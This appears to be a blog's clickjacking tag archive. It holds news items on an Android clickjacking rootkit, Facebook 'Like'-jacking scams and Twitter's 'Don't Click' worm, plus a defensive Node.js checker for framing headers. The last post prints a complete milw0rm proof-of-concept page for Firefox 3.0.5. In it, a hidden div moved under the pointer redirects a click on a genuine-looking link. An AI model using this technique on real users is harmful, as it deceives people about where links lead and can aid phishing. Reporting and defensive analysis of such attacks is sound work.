Posts tagged: Clickjacking

Jul 05 2012

Android Clickjacking Rootkit Demonstrated

A team of security researchers has demonstrated how a security flaw in Android 4.0.4 can be exploited by a clickjacking rootkit.

The research team is led by North Carolina State University professor Xuxian Jiang, who succeeded in developing a proof-of-concept rootkit that attacks the Android framework rather than the underlying operating system kernel. The researchers contend that such a rootkit could be delivered inside an infected app and then used to manipulate the smartphone.

In the video, the demonstrator was able to hide applications on the device and to have them launch when the icons of other applications are tapped. If delivered with an infected application, the rootkit could, for example, hide the smartphone's real browser and replace it with a look-alike that captures everything the user enters.

Feb 22 2011

Facebook ClickJacking : Malware takes on new Italian disguises

Facebook users have been subjected to clickjacking attacks that force them to authorize actions they had no intention of approving.

The latest few campaigns seen by SophosLabs, for instance, target Italian users of the social network.

COCA COLA: Dopo aver visto questo video non berrò più coca cola. Svelata la ricetta segreta. Guarda il video verita

Which translates as: “COCA COLA: After watching this video you won’t drink Coca Cola. The secret recipe revealed. Watch the video truth.”

LO SCHERZO DI SAN VALENTINO CHE STA FACENDO IL GIRO DEL MONDO! TE RETO A VER ESTA PAGINA PARA 5 SEGUNDOS SIN REIRTE

Which translates as: “THE VALENTINE’S DAY JOKE THAT IS GOING AROUND THE WORLD! I CHALLENGE YOU TO VIEW THIS PAGE FOR 5 SECONDS WITHOUT LAUGHING.”

All of these Facebook scams use clickjacking techniques to trick the user into “liking” them.

SophosLabs is intercepting the suspicious pages as Mal/FBJack-A.

Facebook users can protect themselves from clickjacking threats like this by using browser plugins such as NoScript for Firefox (its ClearClick feature is the component that flags clicks landing on hidden or obscured frames). The fix that removes the problem for everyone, however, is on the server side: a page that refuses to be loaded in a third-party frame cannot have its "Like" button placed under a decoy.


Source: NakedSecurity | Sophos

Feb 15 2009

Twitter hit with ‘Don’t Click’ clickjacking attack

Twitter stopped a clickjacking attack on Thursday that quickly spread because it took advantage of social engineering and people's natural curiosity.

Tweets began appearing that said “Don’t Click” followed by a link. Naturally, people clicked. When they did so, a tweet was sent from their account with the same “Don’t Click” message and link.

“We patched the ‘don’t click’ clickjacking attack 10 minutes ago. Problem should be gone,” John Adams, aka Netik, an operations engineer at Twitter, tweeted around 11 a.m. PST.

The clickjacking appeared to be harmless and just propagated itself, according to a post on the Sunlight Labs blog.

The code “creates an iframe of the page, hides it, and when you click that button and you’re logged into Twitter, it makes you post that message (even though you don’t see it). There’s not a bit of JavaScript involved. The only JavaScript on the page is their Google Analytics code,” the Sunlight Labs post says.

Source: CNet
http://news.cnet.com/8301-1009_3-10162812-83.html
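Both the Facebook "Like"-jacking campaigns above and the Twitter "Don't Click" worm depend on one precondition: the victim page (the Like button, the Twitter update form) can be loaded inside a cross-site iframe and hidden under a decoy. The check below is an added example, not code from the Sophos or CNet articles or from either site: given the HTTP response headers of a page, it decides whether a browser would let a given framing origin embed it, applying the rule that a Content-Security-Policy frame-ancestors directive overrides X-Frame-Options when both are present, and that no policy at all means anyone may frame the page. The header sets, the origins (https://evil.example, https://app.partner.example) and the audit() helper are constructed for illustration; the framing origin stands in for the top-level browsing context's origin.

```javascript
// Added example (not from the Sophos or CNet articles). Node.js, no dependencies.

// Return the CSP frame-ancestors source list, lower-cased, or null if absent.
function frameAncestors(csp) {
  if (!csp) return null;
  for (const directive of csp.split(';')) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0] && tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1).map((t) => t.toLowerCase());
    }
  }
  return null;
}

// Match one frame-ancestors source expression against the framing origin.
// Supported: 'none', 'self', *, scheme sources such as https:, and host
// sources with an optional scheme and a leading *. wildcard (ports ignored).
function sourceMatches(src, framingOrigin, selfOrigin) {
  if (src === "'none'") return false;
  if (src === "'self'") return framingOrigin === selfOrigin;
  if (src === '*') return true;
  const f = new URL(framingOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return f.protocol === src;
  const m = src.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^/:*]+)(?::[0-9*]+)?$/);
  if (!m) return false;
  const [, scheme, wildcard, host] = m;
  if (scheme && f.protocol !== scheme + ':') return false;
  return wildcard ? f.hostname.endsWith('.' + host) : f.hostname === host;
}

// Would a browser let framingOrigin embed a page served with these headers?
function isFrameable(headers, framingOrigin, targetOrigin) {
  const h = {};
  for (const [name, value] of Object.entries(headers)) h[name.toLowerCase()] = value;

  // When frame-ancestors is present, X-Frame-Options is ignored entirely.
  const ancestors = frameAncestors(h['content-security-policy']);
  if (ancestors) {
    return ancestors.some((src) => sourceMatches(src, framingOrigin, targetOrigin));
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return framingOrigin === targetOrigin;
  // No header, or a value browsers do not recognise (ALLOW-FROM was only ever
  // honoured by some of them): the header is ignored and the frame is allowed.
  return true;
}

// Constructed header sets standing in for the situations in the two posts.
const SAMPLES = {
  // A page with no framing policy, as the attacked pages were: anyone may frame it.
  unprotected: {},
  // No third-party site can frame it.
  deny: { 'X-Frame-Options': 'DENY' },
  // Only the site itself may frame it.
  sameOrigin: { 'X-Frame-Options': 'SAMEORIGIN' },
  // CSP wins: a partner domain is allowed even though X-Frame-Options says DENY.
  cspWins: {
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self' https://*.partner.example",
  },
};

// Evaluate every sample for an attacker origin and for the site's own origin.
function audit(targetOrigin, attackerOrigin) {
  const report = {};
  for (const [name, headers] of Object.entries(SAMPLES)) {
    report[name] = {
      attackerCanFrame: isFrameable(headers, attackerOrigin, targetOrigin),
      selfCanFrame: isFrameable(headers, targetOrigin, targetOrigin),
    };
  }
  return report;
}

console.log(JSON.stringify(audit('https://twitter.com', 'https://evil.example'), null, 2));
```

Pointing isFrameable() at real response headers (curl -I against the form or button URL) is the quickest way to tell whether a page is still exposed to this class of attack; the in-page frame-busting scripts that were the usual defence in 2009 are not consulted here because they can be bypassed from the framing page, whereas the headers are enforced by the browser before the page is rendered.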

Jan 22 2009

Firefox 3.0.5 Status Bar Obfuscation / Clickjacking

Firefox 3.0.5 Status Bar Obfuscation / Clickjacking
===========================================

<html>
<body>
<!-- A 2x2 white div that is moved under the mouse pointer when the link is
     clicked; its onmouseover then navigates to milw0rm.com even though the
     status bar showed the link's genuine href, http://www.google.com -->
<div id="mydiv"
onmouseover="document.location='http://www.milw0rm.com';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
// Place the div directly under the pointer (unitless left/top are accepted
// because the page has no doctype and therefore renders in quirks mode)
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}
</script>
<center>
<br>
<font style="font-family:arial;font-size:32px">Status Bar Obfuscation
/ Clickjacking</font><br>
<font style="font-family:arial;font-size:24px">By MrDoug</font><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:20px">Click the VALID link to
google below to visit milw0rm.com</font><br>
<br>
<!-- The visible link really points at google.com; only the onclick handler is hostile -->
<a href="http://www.google.com" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:16px">Greetz to Slappywag</font><br>
</center>
<div style="position:absolute;bottom:0;">
<font style="font-family:arial;font-size:32px">Note this…<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;V
</font>
</div>
</body>
</html>

===========================================
MrDoug
mrdoug13[at]gmail[dot]com

# milw0rm.com [2009-01-21]